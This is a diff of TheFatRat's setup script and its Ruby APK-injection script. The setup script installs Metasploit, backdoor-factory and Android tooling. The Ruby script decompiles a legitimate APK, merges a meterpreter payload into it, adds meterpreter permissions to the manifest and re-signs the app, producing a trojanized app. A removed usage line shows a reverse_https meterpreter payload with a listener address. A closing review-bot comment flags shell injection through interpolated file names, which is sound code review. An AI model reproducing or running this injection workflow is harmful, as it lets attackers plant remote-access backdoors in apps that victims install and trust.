echo "[ ✔ ] Done installing .... " echo "[ ✔ ] Done installing .... "
which i586-mingw32msvc-gcc >> $log 2>&1
sleep 2 sleep 2
fi fi
@ -109,12 +129,14 @@ fi
which monodevelop > /dev/null 2>&1 which monodevelop > /dev/null 2>&1
if [ "$?" -eq "0" ]; then if [ "$?" -eq "0" ]; then
echo "[ ✔ ] Monodevelop ......................[ found ]" echo "[ ✔ ] Monodevelop ......................[ found ]"
which monodevelop >> $log 2>&1
sleep 2 sleep 2
else else
echo "[ X ] Monodevelop -> not found ]" echo "[ X ] Monodevelop -> not found ]"
echo "[ ! ] Installing monodevelop from your apt sources ]" echo "[ ! ] Installing monodevelop from your apt sources ]"
xterm -T "☣ INSTALL MONODEVELOP ☣" -geometry 100x30 -e "sudo apt-get install monodevelop -y" xterm -T "☣ INSTALL MONODEVELOP ☣" -geometry 100x30 -e "sudo apt-get install monodevelop -y"
echo "[ ✔ ] Done installing ...." echo "[ ✔ ] Done installing ...."
which monodevelop >> $log 2>&1
sleep 2 sleep 2
fi fi
@ -122,12 +144,14 @@ fi
which ruby > /dev/null 2>&1 which ruby > /dev/null 2>&1
if [ "$?" -eq "0" ]; then if [ "$?" -eq "0" ]; then
echo "[ ✔ ] Ruby .............................[ found ]" echo "[ ✔ ] Ruby .............................[ found ]"
which ruby >> $log 2>&1
sleep 2 sleep 2
else else
echo "[ X ] Ruby -> not found ]" echo "[ X ] Ruby -> not found ]"
echo "[ ! ] Installing ruby from your apt sources ]" echo "[ ! ] Installing ruby from your apt sources ]"
xterm -T "☣ INSTALL RUBY ☣" -geometry 100x30 -e "sudo apt-get install ruby -y" xterm -T "☣ INSTALL RUBY ☣" -geometry 100x30 -e "sudo apt-get install ruby -y"
echo "[ ✔ ] Done installing ...." echo "[ ✔ ] Done installing ...."
which ruby >> $log 2>&1
sleep 2 sleep 2
fi fi
@ -135,12 +159,14 @@ fi
which apache2 > /dev/null 2>&1 which apache2 > /dev/null 2>&1
if [ "$?" -eq "0" ]; then if [ "$?" -eq "0" ]; then
echo "[ ✔ ] Apache2 ..........................[ found ]" echo "[ ✔ ] Apache2 ..........................[ found ]"
which apache2 >> $log 2>&1
sleep 2 sleep 2
else else
echo "[ X ] Apache2 -> not found ]" echo "[ X ] Apache2 -> not found ]"
echo "[ ! ] Installing apache2 from your apt sources ]" echo "[ ! ] Installing apache2 from your apt sources ]"
xterm -T "☣ INSTALL APACHE2 ☣" -geometry 100x30 -e "sudo apt-get install apache2 -y" xterm -T "☣ INSTALL APACHE2 ☣" -geometry 100x30 -e "sudo apt-get install apache2 -y"
echo "[ ✔ ] Done installing ...." echo "[ ✔ ] Done installing ...."
which apache2 >> $log 2>&1
sleep 2 sleep 2
fi fi
@ -150,12 +176,14 @@ fi
which gnome-terminal > /dev/null 2>&1 which gnome-terminal > /dev/null 2>&1
if [ "$?" -eq "0" ]; then if [ "$?" -eq "0" ]; then
echo "[ ✔ ] Gnome Terminal....................[ found ]" echo "[ ✔ ] Gnome Terminal....................[ found ]"
which gnome-terminal >> $log 2>&1
sleep 2 sleep 2
else else
echo "[ X ] Gnome-terminal-> not found ]" echo "[ X ] Gnome-terminal-> not found ]"
echo "[ ! ] Installing gnome-terminal from your apt sources ]" echo "[ ! ] Installing gnome-terminal from your apt sources ]"
xterm -T "☣ INSTALL GNOME-TERMINAL ☣" -geometry 100x30 -e "sudo apt-get install gnome-terminal -y" xterm -T "☣ INSTALL GNOME-TERMINAL ☣" -geometry 100x30 -e "sudo apt-get install gnome-terminal -y"
echo "[ ✔ ] Done installing ...." echo "[ ✔ ] Done installing ...."
which gnome-terminal >> $log 2>&1
sleep 2 sleep 2
fi fi
@ -163,12 +191,95 @@ fi
which upx > /dev/null 2>&1 which upx > /dev/null 2>&1
if [ "$?" -eq "0" ]; then if [ "$?" -eq "0" ]; then
echo "[ ✔ ] UPX Compressor....................[ found ]" echo "[ ✔ ] UPX Compressor....................[ found ]"
which upx >> $log 2>&1
sleep 2 sleep 2
else else
echo "[ X ] Upx compressor -> not found ]" echo "[ X ] Upx compressor -> not found ]"
echo "[ ! ] Installing upx-compressor from your apt sources ]" echo "[ ! ] Installing upx-compressor from your apt sources ]"
xterm -T "☣ INSTALL UPX COMPRESSOR ☣" -geometry 100x30 -e "sudo apt-get install upx-ucl -y" xterm -T "☣ INSTALL UPX COMPRESSOR ☣" -geometry 100x30 -e "sudo apt-get install upx-ucl -y"
echo "[ ✔ ] Done installing ...." echo "[ ✔ ] Done installing ...."
which upx >> $log 2>&1
sleep 2
fi
#Checking if keytool exists
which keytool > /dev/null 2>&1
if [ "$?" -eq "0" ]; then
echo "[ ✔ ] Keytool (java)....................[ found ]"
which keytool >> $log 2>&1
sleep 2
else
echo "[ X ] Keytool (java) -> not found ]"
echo "[ ! ] Installing Java from your apt sources ]"
xterm -T "☣ INSTALL JAVA ☣" -geometry 100x30 -e "sudo apt-get install default-jre default-jdk -y "
echo "[ ✔ ] Done installing ...."
which keytool >> $log 2>&1
sleep 2
fi
#Checking if Jarsigner exists
which jarsigner > /dev/null 2>&1
if [ "$?" -eq "0" ]; then
echo "[ ✔ ] Jarsigner (java)..................[ found ]"
which jarsigner >> $log 2>&1
sleep 2
else
echo "[ X ] Jarsigner (java) -> not found ]"
echo "[ ! ] Installing Java from your apt sources ]"
xterm -T "☣ INSTALL JAVA ☣" -geometry 100x30 -e "sudo apt-get install default-jdk -y "
echo "[ ✔ ] Done installing ...."
which jarsigner >> $log 2>&1
sleep 2
fi
#Checking if Unzip exists
which unzip > /dev/null 2>&1
if [ "$?" -eq "0" ]; then
echo "[ ✔ ] Unzip.............................[ found ]"
which unzip >> $log 2>&1
sleep 2
else
echo "[ X ] Unzip -> not found ]"
echo "[ ! ] Installing Unzip from your apt sources ]"
xterm -T "☣ INSTALL UNZIP ☣" -geometry 100x30 -e "sudo apt-get install unzip -y "
echo "[ ✔ ] Done installing ...."
which unzip >> $log 2>&1
sleep 2
fi
#Checking if Aapt exists
which aapt > /dev/null 2>&1
if [ "$?" -eq "0" ]; then
echo "[ ✔ ] Aapt..............................[ found ]"
which aapt >> $log 2>&1
sleep 2
else
echo "[ X ] Aapt -> not found ]"
echo "[ ! ] Installing Aapt from your apt sources ]"
xterm -T "☣ INSTALL AAPT ☣" -geometry 100x30 -e "sudo apt-get install aapt -y "
echo "[ ✔ ] Done installing ...."
which aapt >> $log 2>&1
sleep 2
fi
#Installing dependencies for Zipalign
echo "[ ! ] Installing Zipalign dependencies from your apt sources"
xterm -T "☣ INSTALL ZIPALING ☣" -geometry 100x30 -e "sudo apt-get install lib32stdc++6 lib32z1 lib32z1-dev -y "
echo "[ ✔ ] Done installing ...."
sleep 2
#Checking if Zipalign exists
which zipalign > /dev/null 2>&1
if [ "$?" -eq "0" ]; then
echo "[ ✔ ] Zipalign..........................[ found ]"
which zipalign >> $log 2>&1
sleep 2
else
echo "[ X ] Zipalign -> not found ]"
echo "[ ! ] Installing Zipalign from your apt sources "
xterm -T "☣ INSTALL ZIPALIGN ☣" -geometry 100x30 -e "sudo apt-get install zipalign -y "
echo "[ ✔ ] Done installing ...."
which zipalign >> $log 2>&1
sleep 2 sleep 2
fi fi
@ -193,41 +304,63 @@ echo 'deb-src http://old.kali.org/kali sana main non-free contrib' >> /etc/apt/s
echo 'deb http://http.kali.org/kali kali-rolling main contrib non-free' >> /etc/apt/sources.list echo 'deb http://http.kali.org/kali kali-rolling main contrib non-free' >> /etc/apt/sources.list
echo 'deb-src http://http.kali.org/kali kali-rolling main contrib non-free' >> /etc/apt/sources.list echo 'deb-src http://http.kali.org/kali kali-rolling main contrib non-free' >> /etc/apt/sources.list
sleep 2 sleep 2
xterm -T "☣ UPDATING KALI REPO ☣" -geometry 100x30 -e "sudo apt-get update" xterm -T "☣ UPDATING KALI REPO ☣" -geometry 100x30 -e "sudo apt-get update" >>$log 2>&1
#Checking if apktool exists #Checking if apktool exists
which apktool > /dev/null 2>&1 which apktool > /dev/null 2>&1
if [ "$?" -eq "0" ]; then if [ "$?" -eq "0" ]; then
echo "[ ✔ ] Apktool...........................[ found ]" echo "[ ✔ ] Apktool...........................[ found ]"
which apktool >> $log 2>&1
sleep 2 sleep 2
else else
echo "[ X ] Apktool -> not found ]" echo "[ X ] Apktool -> not found "
echo "[ ! ] Installing apktool from Kali repositories ]" echo "[ ! ] Installing apktool from Kali repositories "
xterm -T "☣ INSTALL APKTOOOL ☣" -geometry 100x30 -e "sudo apt-get install apktool --force-yes -y" xterm -T "☣ INSTALL APKTOOOL ☣" -geometry 100x30 -e "sudo apt-get install apktool --force-yes -y"
echo "[ ✔ ] Done installing ...." echo "[ ✔ ] Done installing ...."
which apktool >> $log 2>&1
sleep 2 sleep 2
fi fi
#Checking if dex2jar exists
which d2j-jar2dex > /dev/null 2>&1
if [ "$?" -eq "0" ]; then
echo "[ ✔ ] Dex2Jar...........................[ found ]"
which d2j-jar2dex >> $log 2>&1
sleep 2
else
echo "[ X ] Dex2jar -> not found "
echo "[ ! ] Installing dex2jar from Kali repositories "
xterm -T "☣ INSTALL APKTOOOL ☣" -geometry 100x30 -e "sudo apt-get install dex2jar --force-yes -y"
echo "[ ✔ ] Done installing ...."
which d2j-jar2dex >> $log 2>&1
sleep 2
fi
#installing dependencies for ruby script
echo "[ ! ] Installing dedepndencies for ruby script from Kali repositories "
xterm -T "☣ INSTALL DEPENDENCIES ☣" -geometry 100x30 -e "sudo apt-get install zlib1g-dev libmagickwand-dev imagemagick -y"
echo "[ ✔ ] Done installing ...."
sleep 2
# check if metasploit-framework its installed # check if metasploit-framework its installed
which msfconsole > /dev/null 2>&1 which msfconsole > /dev/null 2>&1
if [ "$?" -eq "0" ]; then if [ "$?" -eq "0" ]; then
echo "[ ✔ ] Metasploit-Framework..............[ found ]" echo "[ ✔ ] Metasploit-Framework..............[ found ]"
# msf was detected , removing config file in case setup was already configured before # msf was detected , removing config file in case setup was already configured before
rm -f config.path rm -f $config
#Creating new config file based on last detection of msf #Creating new config file based on last detection of msf
touch config.path touch $config
echo "********************************************************************************************************" >> config.path echo "********************************************************************************************************" >> $config
echo "** Configuration Paths for TheFatRat , do not delete anything from this file or program will not work **" >> config.path echo "** Configuration Paths for TheFatRat , do not delete anything from this file or program will not work **" >> $config
echo "** if you need to reconfig your tools path , then run ./setup.sh in (TheFatRat directory) . **" >> config.path echo "** if you need to reconfig your tools path , then run ./setup.sh in (TheFatRat directory) . **" >> $config
echo "********************************************************************************************************" >> config.path echo "********************************************************************************************************" >> $config
echo "msfconsole" >> config.path echo "msfconsole" | tee -a $config $log > /dev/null 2>&1
echo "msfvenom" >> config.path echo "msfvenom" | tee -a $config $log > /dev/null 2>&1
sleep 2 sleep 2
else else
echo "" echo ""
echo "[ X ] metasploit-framework -> not found ]" echo "[ X ] metasploit-framework -> not found "
# Providing manual input to user in case metasploit was installed from git and is not on system path # Providing manual input to user in case metasploit was installed from git and is not on system path
echo "" echo ""
@ -237,39 +370,39 @@ read -p "Press Y/y to config metasploit-framework path or N/n to install it from
case "$choice" in case "$choice" in
y|Y) y|Y)
rm -f config.path rm -f $config
touch config.path touch $config
echo "********************************************************************************************************" >> config.path echo "********************************************************************************************************" >> $config
echo "** Configuration Paths for TheFatRat , do not delete anything from this file or program will not work **" >> config.path echo "** Configuration Paths for TheFatRat , do not delete anything from this file or program will not work **" >> $config
echo "** if you need to reconfig your tools path , then run ./setup.sh in (TheFatRat directory) . **" >> config.path echo "** if you need to reconfig your tools path , then run ./setup.sh in (TheFatRat directory) . **" >> $config
echo "********************************************************************************************************" >> config.path echo "********************************************************************************************************" >> $config
clear clear
echo "Enter the path of your Metasploit Instalation or just press enter for default config ." echo -e $white "Enter the path of your Metasploit Instalation or just press enter for default config :
echo -e $white "Ex:(/opt/metasploit-framework)"; ex:(/opt/metasploit-framework)";
read -p "Path:" msfc read -p "Path: " msfc
if [[ -z "$msfc" ]]; then if [[ -z "$msfc" ]]; then
echo "msfconsole" >> config.path echo "msfconsole" | tee -a $config $log > /dev/null 2>&1
echo "msfvenom" >> config.path echo "msfvenom" | tee -a $config $log > /dev/null 2>&1
else else
echo "ruby $msfc/msfconsole" >> config.path echo "ruby $msfc/msfconsole" | tee -a $config $log > /dev/null 2>&1
echo "ruby $msfc/msfvenom" >> config.path echo "ruby $msfc/msfvenom" | tee -a $config $log > /dev/null 2>&1
fi fi
;; ;;
n|N) n|N)
echo "[ ! ] Installing metasploit-framework from kali repositories ]" echo "[ ! ] Installing metasploit-framework from kali repositories "
xterm -T "☣ INSTALL METASPLOIT-FRAMEWORK ☣" -geometry 100x30 -e "sudo apt-get install metasploit-framework --force-yes -y" xterm -T "☣ INSTALL METASPLOIT-FRAMEWORK ☣" -geometry 100x30 -e "sudo apt-get install metasploit-framework --force-yes -y"
echo "[ ✔ ] Done installing ...." echo "[ ✔ ] Done installing ...."
rm -f config.path rm -f $config
touch config.path touch $config
echo "********************************************************************************************************" >> config.path echo "********************************************************************************************************" >> $config
echo "** Configuration Paths for TheFatRat , do not delete anything from this file or program will not work **" >> config.path echo "** Configuration Paths for TheFatRat , do not delete anything from this file or program will not work **" >> $config
echo "** if you need to reconfig your tools path , then run ./setup.sh in (TheFatRat directory) . **" >> config.path echo "** if you need to reconfig your tools path , then run ./setup.sh in (TheFatRat directory) . **" >> $config
echo "********************************************************************************************************" >> config.path echo "********************************************************************************************************" >> $config
# adding the msf startups automatically to config file # adding the msf startups automatically to config file
echo "msfconsole" >> config.path echo "msfconsole" | tee -a $config $log > /dev/null 2>&1
echo "msfvenom" >> config.path echo "msfvenom" | tee -a $config $log > /dev/null 2>&1
;; ;;
*) *)
@ -282,25 +415,24 @@ fi
which backdoor-factory > /dev/null 2>&1 which backdoor-factory > /dev/null 2>&1
if [ "$?" -eq "0" ]; then if [ "$?" -eq "0" ]; then
echo "[ ✔ ] Backdoor-Factory..................[ found ]" echo "[ ✔ ] Backdoor-Factory..................[ found ]"
echo "backdoor-factory" >> config.path echo "backdoor-factory" | tee -a $config $log > /dev/null 2>&1
sleep 2 sleep 2
else else
echo "[ X ] backdoor-factory -> not found ]" echo "[ X ] backdoor-factory -> not found "
echo "" echo ""
echo -e $white "[This script requires backdoor-factory echo -e $white "[This script requires backdoor-factory , do you want to setup its path manually ?]";
, do you want to setup its path manually ?]";
read -p "[Press Y/y to setup backdoor-factory path or N/n to install it from Kali repositories . ]" choice1 read -p "[Press Y/y to setup backdoor-factory path or N/n to install it from Kali repositories . ]" choice1
case "$choice1" in case "$choice1" in
y|Y ) y|Y )
clear clear
echo -e $white "Enter the path for backdoor.py ex:(/opt/backdoor-factory/backdoor.py) echo -e $white "Enter the path for backdoor.py , or just press [ENTER] for default config :
, or just press [ENTER] for default config : "; ex:(/opt/backdoor-factory/backdoor.py)";
read -p "Path:" backdoor read -p "Path: " backdoor
if [[ -z "$backdoor" ]]; then if [[ -z "$backdoor" ]]; then
echo "backdoor-factory" >> config.path echo "backdoor-factory" | tee -a $config $log > /dev/null 2>&1
else else
echo "python2 $backdoor" >> config.path echo "python2 $backdoor" | tee -a $config $log > /dev/null 2>&1
fi fi
;; ;;
@ -308,7 +440,7 @@ fi
echo "[ ! ] Installing backdoor-factory from kali repositories ]" echo "[ ! ] Installing backdoor-factory from kali repositories ]"
xterm -T "☣ INSTALL BACKDOOR-FACTORY ☣" -geometry 100x30 -e "sudo apt-get install backdoor-factory --force-yes -y" xterm -T "☣ INSTALL BACKDOOR-FACTORY ☣" -geometry 100x30 -e "sudo apt-get install backdoor-factory --force-yes -y"
echo "[ ✔ ] Done installing ...." echo "[ ✔ ] Done installing ...."
echo "backdoor-factory" >> config.path echo "backdoor-factory" | tee -a $config $log > /dev/null 2>&1
;; ;;
*) *)
@ -316,13 +448,12 @@ echo "Invalid Input (Choose y/Y or n/N only)"
;; ;;
esac; esac;
fi fi
sleep 2
# check if searchsploit exists # check if searchsploit exists
which searchsploit > /dev/null 2>&1 which searchsploit > /dev/null 2>&1
if [ "$?" -eq "0" ]; then if [ "$?" -eq "0" ]; then
echo "[ ✔ ] Searchsploit......................[ found ]" echo "[ ✔ ] Searchsploit......................[ found ]"
echo "searchsploit" >> config.path echo "searchsploit" | tee -a $config $log > /dev/null 2>&1
sleep 2 sleep 2
else else
echo "[ X ] searchsploit -> not found]" echo "[ X ] searchsploit -> not found]"
@ -333,13 +464,13 @@ case "$choice2" in
y|Y ) y|Y )
clear clear
echo -e $yellow "Enter the path for searchsploit ex:(/opt/searchsploit/searchsploit) echo -e $white "Enter the path for searchsploit , or just press [ENTER] for default config :
, or just press [ENTER] for default config : " ex:(/opt/searchsploit/searchsploit) "
read -p "Path: " searchsploit read -p "Path: " searchsploit
if [[ -z "$searchsploit" ]]; then if [[ -z "$searchsploit" ]]; then
echo "searchsploit" >> config.path echo "searchsploit" | tee -a $config $log > /dev/null 2>&1
else else
echo "bash $searchsploit" >> config.path echo "bash $searchsploit" | tee -a $config $log > /dev/null 2>&1
fi fi
;; ;;
@ -347,7 +478,7 @@ n|N )
echo "[ ! ] Installing searchsploit from kali repositories ]" echo "[ ! ] Installing searchsploit from kali repositories ]"
xterm -T "☣ INSTALL SEARCHSPLOIT ☣" -geometry 100x30 -e "sudo apt-get install exploitdb --force-yes -y" xterm -T "☣ INSTALL SEARCHSPLOIT ☣" -geometry 100x30 -e "sudo apt-get install exploitdb --force-yes -y"
echo "[ ✔ ] Done installing ...." echo "[ ✔ ] Done installing ...."
echo "searchsploit" >> config.path echo "searchsploit" | tee -a $config $log > /dev/null 2>&1
sleep 2 sleep 2
echo "" echo ""
echo "Configuration and tool installed with success!"; echo "Configuration and tool installed with success!";
@ -383,7 +514,7 @@ rm -f /usr/local/sbin/fatrat
touch /usr/local/sbin/fatrat touch /usr/local/sbin/fatrat
echo "#!/bin/bash" > /usr/local/sbin/fatrat echo "#!/bin/bash" > /usr/local/sbin/fatrat
echo $scrp >> /usr/local/sbin/fatrat echo $scrp >> /usr/local/sbin/fatrat
chmod +x /usr/local/sbin/fatrat chmod +x /usr/local/sbin/fatrat
clear clear
echo ""; echo "";
echo "[ ]====================================================================[ ]"; echo "[ ]====================================================================[ ]";
@ -391,6 +522,7 @@ echo "";
echo "[ ]====================================================================[ ]"; echo "[ ]====================================================================[ ]";
echo ""; echo "";
chmod +x fatrat chmod +x fatrat
which fatrat >> $log 2>&1
sleep 2 sleep 2
;; ;;


@ -89,8 +89,8 @@ def fix_manifest()
} }
original_permissions=[] original_permissions=[]
apk_mani='' apk_mani=''
#Load original apk's permissions #Load original apk's permissions
File.open("output/original/AndroidManifest.xml","r"){|file2| File.open("output/original/AndroidManifest.xml","r"){|file2|
k=File.read(file2) k=File.read(file2)
apk_mani=k apk_mani=k
@ -152,29 +152,6 @@ unless(apk_v.split()[1].include?("v2."))
exit(1) exit(1)
end end
begin
msfvenom_opts = ARGV[1,ARGV.length]
opts=""
msfvenom_opts.each{|x|
opts+=x
opts+=" "
}
rescue
puts "Usage: #{$0} [target.apk] [msfvenom options]\n"
puts "e.g. #{$0} messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443"
puts "[-] Error parsing msfvenom options. Exiting.\n"
exit(1)
end
print "[*] Generating msfvenom payload..\n"
res=`msfvenom -f raw #{opts} -o output/payload.apk `
if res.downcase.include?("invalid" || "error")
puts res
exit(1)
end
print "[*] Signing payload..\n" print "[*] Signing payload..\n"
`jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA 'output/payload.apk' androiddebugkey` `jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA 'output/payload.apk' androiddebugkey`
@ -183,7 +160,7 @@ print "[*] Signing payload..\n"
`cp #{apkfile} output/original.apk` `cp #{apkfile} output/original.apk`
print "[*] Decompiling orignal APK..\n" print "[*] Decompiling original APK..\n"
`apktool d output/original.apk -o output/original` `apktool d output/original.apk -o output/original`
print "[*] Decompiling payload APK..\n" print "[*] Decompiling payload APK..\n"
`apktool d output/payload.apk -o output/payload` `apktool d output/payload.apk -o output/payload`
@ -226,7 +203,7 @@ print "[*] Poisoning the manifest with meterpreter permissions..\n"
fix_manifest() fix_manifest()
print "[*] Rebuilding #{apkfile} with meterpreter injection as #{injected_apk}..\n" print "[*] Rebuilding #{apkfile} with meterpreter injection as #{injected_apk}..\n"
`apktool b -o output/#{injected_apk} output/original` `apktool b -o #{injected_apk} output/original`
print "[*] Signing #{injected_apk} ..\n" print "[*] Signing #{injected_apk} ..\n"
`jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA #{injected_apk} androiddebugkey` `jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA #{injected_apk} androiddebugkey`
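Review bot: The changed `apktool b -o #{injected_apk} output/original` line and the `jarsigner` call after it interpolate `#{injected_apk}` into a backtick command, so the shell parses the APK file name: a name containing a space breaks the build, and one containing shell metacharacters is executed as a command on the machine running the script. The same applies to `cp #{apkfile} output/original.apk` in the earlier hunk of this file. The argument-list form of `system` bypasses the shell, e.g. `system("apktool", "b", "-o", injected_apk, "output/original") or abort("apktool build failed")`, and it also stops the script on a failed build instead of continuing on to sign a file that was never written. The assignment of `injected_apk` is outside the visible hunks, so whether the name is validated earlier cannot be confirmed from here.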